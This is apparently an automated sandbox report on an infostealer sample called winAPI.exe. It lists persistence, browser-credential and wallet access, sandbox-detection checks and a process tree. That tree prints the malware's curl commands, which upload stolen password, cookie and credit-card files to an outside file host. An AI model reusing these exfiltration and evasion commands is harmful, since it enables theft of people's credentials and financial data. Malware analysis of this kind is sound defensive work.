d9cd6884ad7518018efaa52cde9c0ed46fba959e9ea093c97e68004dbf2cad66

Resubmissions

18-05-2024 22:03

240518-1ylw4aaa81 7

17-05-2024 15:56

240517-tdfq1sfb58 9

Analysis

max time kernel
209s
max time network
212s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
18-05-2024 22:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

winAPI.exe
Size

28.5MB
MD5

a6c1b27e646cf5904a69e45ffc8808d5
SHA1

7cbafd874594bf3ee91cc49d7fa8ec686b4cad80
SHA256

d9cd6884ad7518018efaa52cde9c0ed46fba959e9ea093c97e68004dbf2cad66
SHA512

b55adebe3be59f15eb66a80d2b328d20e3a7fb1aa8d666e37195855f0a510e9abaefe0ad58ec20e14b1d3426995c9e54c6fe9491704db44931a2777eb5e8c2c8
SSDEEP

393216:Em+sFHI7EzNFAUYl8XRQo/gCcT5NB35jmxEsYAwD6UWsNWcxjQl:Em+GCl3nNWclM

Score

7^/10

pyinstaller spyware stealer upx

Malware Config

Signatures

Drops startup file 1 IoCs

Processes:

ctfsag.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ctfsag.exe ctfsag.exe
Executes dropped EXE 4 IoCs

Processes:

ctfsag.exectfsag.exeoonhju.exeoonhju.exe

pid process

2244 ctfsag.exe
5080 ctfsag.exe
4648 oonhju.exe
436 oonhju.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ctfsag.exe	ctfsag.exe

pid	process
2244	ctfsag.exe
5080	ctfsag.exe
4648	oonhju.exe
436	oonhju.exe

Loads dropped DLL 64 IoCs

Processes:

ctfsag.exeoonhju.exe

pid	process
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
5080	ctfsag.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe
436	oonhju.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/436-293-0x00007FFA56BA0000-0x00007FFA57189000-memory.dmp	upx
behavioral1/memory/436-295-0x00007FFA67000000-0x00007FFA6700F000-memory.dmp	upx
behavioral1/memory/436-297-0x00007FFA66FD0000-0x00007FFA66FDD000-memory.dmp	upx
behavioral1/memory/436-296-0x00007FFA66FE0000-0x00007FFA66FF9000-memory.dmp	upx
behavioral1/memory/436-300-0x00007FFA66850000-0x00007FFA66873000-memory.dmp	upx
behavioral1/memory/436-299-0x00007FFA66880000-0x00007FFA668AD000-memory.dmp	upx
behavioral1/memory/436-298-0x00007FFA668B0000-0x00007FFA668C9000-memory.dmp	upx
behavioral1/memory/436-301-0x00007FFA666D0000-0x00007FFA66847000-memory.dmp	upx
behavioral1/memory/436-302-0x00007FFA65CD0000-0x00007FFA65D03000-memory.dmp	upx
behavioral1/memory/436-294-0x00007FFA67140000-0x00007FFA67163000-memory.dmp	upx
behavioral1/memory/436-306-0x00007FFA666B0000-0x00007FFA666C5000-memory.dmp	upx
behavioral1/memory/436-309-0x00007FFA654E0000-0x00007FFA654F4000-memory.dmp	upx
behavioral1/memory/436-315-0x00007FFA65490000-0x00007FFA654A7000-memory.dmp	upx
behavioral1/memory/436-318-0x00007FFA66850000-0x00007FFA66873000-memory.dmp	upx
behavioral1/memory/436-320-0x00007FFA64FA0000-0x00007FFA64FB1000-memory.dmp	upx
behavioral1/memory/436-323-0x00007FFA65C00000-0x00007FFA65CCD000-memory.dmp	upx
behavioral1/memory/436-326-0x00007FFA55F70000-0x00007FFA56665000-memory.dmp	upx
behavioral1/memory/436-328-0x00007FFA57910000-0x00007FFA57948000-memory.dmp	upx
behavioral1/memory/436-327-0x00007FFA666B0000-0x00007FFA666C5000-memory.dmp	upx
behavioral1/memory/436-324-0x00007FFA56670000-0x00007FFA56B92000-memory.dmp	upx
behavioral1/memory/436-358-0x00007FFA65470000-0x00007FFA65489000-memory.dmp	upx
behavioral1/memory/436-382-0x00007FFA64F80000-0x00007FFA64F9E000-memory.dmp	upx
behavioral1/memory/436-383-0x00007FFA55F70000-0x00007FFA56665000-memory.dmp	upx
behavioral1/memory/436-381-0x00007FFA64FA0000-0x00007FFA64FB1000-memory.dmp	upx
behavioral1/memory/436-380-0x00007FFA64FC0000-0x00007FFA650DC000-memory.dmp	upx
behavioral1/memory/436-379-0x00007FFA654E0000-0x00007FFA654F4000-memory.dmp	upx
behavioral1/memory/436-378-0x00007FFA65500000-0x00007FFA65514000-memory.dmp	upx
behavioral1/memory/436-377-0x00007FFA65520000-0x00007FFA65532000-memory.dmp	upx
behavioral1/memory/436-376-0x00007FFA666B0000-0x00007FFA666C5000-memory.dmp	upx
behavioral1/memory/436-375-0x00007FFA56670000-0x00007FFA56B92000-memory.dmp	upx
behavioral1/memory/436-374-0x00007FFA65C00000-0x00007FFA65CCD000-memory.dmp	upx
behavioral1/memory/436-373-0x00007FFA65CD0000-0x00007FFA65D03000-memory.dmp	upx
behavioral1/memory/436-372-0x00007FFA666D0000-0x00007FFA66847000-memory.dmp	upx
behavioral1/memory/436-371-0x00007FFA66850000-0x00007FFA66873000-memory.dmp	upx
behavioral1/memory/436-370-0x00007FFA66880000-0x00007FFA668AD000-memory.dmp	upx
behavioral1/memory/436-369-0x00007FFA65420000-0x00007FFA6546D000-memory.dmp	upx
behavioral1/memory/436-368-0x00007FFA66FD0000-0x00007FFA66FDD000-memory.dmp	upx
behavioral1/memory/436-367-0x00007FFA66FE0000-0x00007FFA66FF9000-memory.dmp	upx
behavioral1/memory/436-366-0x00007FFA67000000-0x00007FFA6700F000-memory.dmp	upx
behavioral1/memory/436-365-0x00007FFA67140000-0x00007FFA67163000-memory.dmp	upx
behavioral1/memory/436-364-0x00007FFA654B0000-0x00007FFA654D2000-memory.dmp	upx
behavioral1/memory/436-363-0x00007FFA57910000-0x00007FFA57948000-memory.dmp	upx
behavioral1/memory/436-357-0x00007FFA65490000-0x00007FFA654A7000-memory.dmp	upx
behavioral1/memory/436-344-0x00007FFA668B0000-0x00007FFA668C9000-memory.dmp	upx
behavioral1/memory/436-339-0x00007FFA56BA0000-0x00007FFA57189000-memory.dmp	upx
behavioral1/memory/436-322-0x00007FFA64F80000-0x00007FFA64F9E000-memory.dmp	upx
behavioral1/memory/436-321-0x00007FFA65CD0000-0x00007FFA65D03000-memory.dmp	upx
behavioral1/memory/436-319-0x00007FFA666D0000-0x00007FFA66847000-memory.dmp	upx
behavioral1/memory/436-317-0x00007FFA65420000-0x00007FFA6546D000-memory.dmp	upx
behavioral1/memory/436-316-0x00007FFA65470000-0x00007FFA65489000-memory.dmp	upx
behavioral1/memory/436-314-0x00007FFA66FE0000-0x00007FFA66FF9000-memory.dmp	upx
behavioral1/memory/436-313-0x00007FFA67140000-0x00007FFA67163000-memory.dmp	upx
behavioral1/memory/436-312-0x00007FFA654B0000-0x00007FFA654D2000-memory.dmp	upx
behavioral1/memory/436-311-0x00007FFA64FC0000-0x00007FFA650DC000-memory.dmp	upx
behavioral1/memory/436-310-0x00007FFA56BA0000-0x00007FFA57189000-memory.dmp	upx
behavioral1/memory/436-308-0x00007FFA65500000-0x00007FFA65514000-memory.dmp	upx
behavioral1/memory/436-307-0x00007FFA65520000-0x00007FFA65532000-memory.dmp	upx
behavioral1/memory/436-304-0x00007FFA56670000-0x00007FFA56B92000-memory.dmp	upx
behavioral1/memory/436-303-0x00007FFA65C00000-0x00007FFA65CCD000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in Windows directory 2 IoCs

Processes:

taskmgr.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ctfsag.exe	pyinstaller

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

4376 WMIC.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

2004 tasklist.exe
5112 tasklist.exe
2664 tasklist.exe

pid	process
4376	WMIC.exe

pid	process
2004	tasklist.exe
5112	tasklist.exe
2664	tasklist.exe

Modifies registry class 2 IoCs

Processes:

taskmgr.exefirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exe

pid	process
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

3616 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetaskmgr.exeWMIC.exeWMIC.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	2004	tasklist.exe
Token: SeDebugPrivilege	3616	taskmgr.exe
Token: SeSystemProfilePrivilege	3616	taskmgr.exe
Token: SeCreateGlobalPrivilege	3616	taskmgr.exe
Token: SeIncreaseQuotaPrivilege	4376	WMIC.exe
Token: SeSecurityPrivilege	4376	WMIC.exe
Token: SeTakeOwnershipPrivilege	4376	WMIC.exe
Token: SeLoadDriverPrivilege	4376	WMIC.exe
Token: SeSystemProfilePrivilege	4376	WMIC.exe
Token: SeSystemtimePrivilege	4376	WMIC.exe
Token: SeProfSingleProcessPrivilege	4376	WMIC.exe
Token: SeIncBasePriorityPrivilege	4376	WMIC.exe
Token: SeCreatePagefilePrivilege	4376	WMIC.exe
Token: SeBackupPrivilege	4376	WMIC.exe
Token: SeRestorePrivilege	4376	WMIC.exe
Token: SeShutdownPrivilege	4376	WMIC.exe
Token: SeDebugPrivilege	4376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4376	WMIC.exe
Token: SeRemoteShutdownPrivilege	4376	WMIC.exe
Token: SeUndockPrivilege	4376	WMIC.exe
Token: SeManageVolumePrivilege	4376	WMIC.exe
Token: 33	4376	WMIC.exe
Token: 34	4376	WMIC.exe
Token: 35	4376	WMIC.exe
Token: 36	4376	WMIC.exe
Token: SeIncreaseQuotaPrivilege	524	WMIC.exe
Token: SeSecurityPrivilege	524	WMIC.exe
Token: SeTakeOwnershipPrivilege	524	WMIC.exe
Token: SeLoadDriverPrivilege	524	WMIC.exe
Token: SeSystemProfilePrivilege	524	WMIC.exe
Token: SeSystemtimePrivilege	524	WMIC.exe
Token: SeProfSingleProcessPrivilege	524	WMIC.exe
Token: SeIncBasePriorityPrivilege	524	WMIC.exe
Token: SeCreatePagefilePrivilege	524	WMIC.exe
Token: SeBackupPrivilege	524	WMIC.exe
Token: SeRestorePrivilege	524	WMIC.exe
Token: SeShutdownPrivilege	524	WMIC.exe
Token: SeDebugPrivilege	524	WMIC.exe
Token: SeSystemEnvironmentPrivilege	524	WMIC.exe
Token: SeRemoteShutdownPrivilege	524	WMIC.exe
Token: SeUndockPrivilege	524	WMIC.exe
Token: SeManageVolumePrivilege	524	WMIC.exe
Token: 33	524	WMIC.exe
Token: 34	524	WMIC.exe
Token: 35	524	WMIC.exe
Token: 36	524	WMIC.exe
Token: SeDebugPrivilege	5112	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4376	WMIC.exe
Token: SeSecurityPrivilege	4376	WMIC.exe
Token: SeTakeOwnershipPrivilege	4376	WMIC.exe
Token: SeLoadDriverPrivilege	4376	WMIC.exe
Token: SeSystemProfilePrivilege	4376	WMIC.exe
Token: SeSystemtimePrivilege	4376	WMIC.exe
Token: SeProfSingleProcessPrivilege	4376	WMIC.exe
Token: SeIncBasePriorityPrivilege	4376	WMIC.exe
Token: SeCreatePagefilePrivilege	4376	WMIC.exe
Token: SeBackupPrivilege	4376	WMIC.exe
Token: SeRestorePrivilege	4376	WMIC.exe
Token: SeShutdownPrivilege	4376	WMIC.exe
Token: SeDebugPrivilege	4376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4376	WMIC.exe
Token: SeRemoteShutdownPrivilege	4376	WMIC.exe
Token: SeUndockPrivilege	4376	WMIC.exe
Token: SeManageVolumePrivilege	4376	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe
3616	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

firefox.exe

pid process

2916 firefox.exe

pid	process
2916	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

winAPI.execmd.exectfsag.exectfsag.execmd.execmd.exeoonhju.exeoonhju.execmd.execmd.execmd.execmd.execmd.execmd.exefirefox.exe

description	pid	process	target process
PID 4092 wrote to memory of 2892	4092	winAPI.exe	cmd.exe
PID 4092 wrote to memory of 2892	4092	winAPI.exe	cmd.exe
PID 2892 wrote to memory of 2244	2892	cmd.exe	ctfsag.exe
PID 2892 wrote to memory of 2244	2892	cmd.exe	ctfsag.exe
PID 2244 wrote to memory of 5080	2244	ctfsag.exe	ctfsag.exe
PID 2244 wrote to memory of 5080	2244	ctfsag.exe	ctfsag.exe
PID 5080 wrote to memory of 936	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 936	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 4456	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 4456	5080	ctfsag.exe	cmd.exe
PID 4456 wrote to memory of 2004	4456	cmd.exe	tasklist.exe
PID 4456 wrote to memory of 2004	4456	cmd.exe	tasklist.exe
PID 5080 wrote to memory of 2884	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 2884	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 420	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 420	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 4948	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 4948	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 3864	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 3864	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 348	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 348	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 3312	5080	ctfsag.exe	cmd.exe
PID 5080 wrote to memory of 3312	5080	ctfsag.exe	cmd.exe
PID 4092 wrote to memory of 1800	4092	winAPI.exe	cmd.exe
PID 4092 wrote to memory of 1800	4092	winAPI.exe	cmd.exe
PID 1800 wrote to memory of 4648	1800	cmd.exe	oonhju.exe
PID 1800 wrote to memory of 4648	1800	cmd.exe	oonhju.exe
PID 4648 wrote to memory of 436	4648	oonhju.exe	oonhju.exe
PID 4648 wrote to memory of 436	4648	oonhju.exe	oonhju.exe
PID 436 wrote to memory of 3120	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 3120	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 824	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 824	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 2808	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 2808	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 4624	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 4624	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 2220	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 2220	436	oonhju.exe	cmd.exe
PID 824 wrote to memory of 4376	824	cmd.exe	WMIC.exe
PID 824 wrote to memory of 4376	824	cmd.exe	WMIC.exe
PID 2808 wrote to memory of 524	2808	cmd.exe	WMIC.exe
PID 2808 wrote to memory of 524	2808	cmd.exe	WMIC.exe
PID 2220 wrote to memory of 5112	2220	cmd.exe	tasklist.exe
PID 2220 wrote to memory of 5112	2220	cmd.exe	tasklist.exe
PID 436 wrote to memory of 4732	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 4732	436	oonhju.exe	cmd.exe
PID 4732 wrote to memory of 2152	4732	cmd.exe	WMIC.exe
PID 4732 wrote to memory of 2152	4732	cmd.exe	WMIC.exe
PID 436 wrote to memory of 3232	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 3232	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 4448	436	oonhju.exe	cmd.exe
PID 436 wrote to memory of 4448	436	oonhju.exe	cmd.exe
PID 4448 wrote to memory of 2664	4448	cmd.exe	tasklist.exe
PID 4448 wrote to memory of 2664	4448	cmd.exe	tasklist.exe
PID 3232 wrote to memory of 2660	3232	cmd.exe	WMIC.exe
PID 3232 wrote to memory of 2660	3232	cmd.exe	WMIC.exe
PID 1684 wrote to memory of 2916	1684	firefox.exe	firefox.exe
PID 1684 wrote to memory of 2916	1684	firefox.exe	firefox.exe
PID 1684 wrote to memory of 2916	1684	firefox.exe	firefox.exe
PID 1684 wrote to memory of 2916	1684	firefox.exe	firefox.exe
PID 1684 wrote to memory of 2916	1684	firefox.exe	firefox.exe
PID 1684 wrote to memory of 2916	1684	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\winAPI.exe
"C:\Users\Admin\AppData\Local\Temp\winAPI.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "start C:\Users\Admin\AppData\Local\Temp\ctfsag.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2892

C:\Users\Admin\AppData\Local\Temp\ctfsag.exe
C:\Users\Admin\AppData\Local\Temp\ctfsag.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2244

C:\Users\Admin\AppData\Local\Temp\ctfsag.exe
C:\Users\Admin\AppData\Local\Temp\ctfsag.exe
4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
5⤵
PID:936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
5⤵
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"
5⤵
PID:2884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"
5⤵
PID:420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"
5⤵
PID:4948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"
5⤵
PID:3864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"
5⤵
PID:348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"
5⤵
PID:3312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "start C:\Users\Admin\AppData\Local\Temp\oonhju.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1800

C:\Users\Admin\AppData\Local\Temp\oonhju.exe
C:\Users\Admin\AppData\Local\Temp\oonhju.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4648

C:\Users\Admin\AppData\Local\Temp\oonhju.exe
C:\Users\Admin\AppData\Local\Temp\oonhju.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
5⤵
PID:3120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
5⤵
- Suspicious use of WriteProcessMemory
PID:824

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
6⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
5⤵
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get Manufacturer
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "gdb --version"
5⤵
PID:4624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
5⤵
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
5⤵
- Suspicious use of WriteProcessMemory
PID:4732

C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_ComputerSystem get Manufacturer
6⤵
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
- Suspicious use of WriteProcessMemory
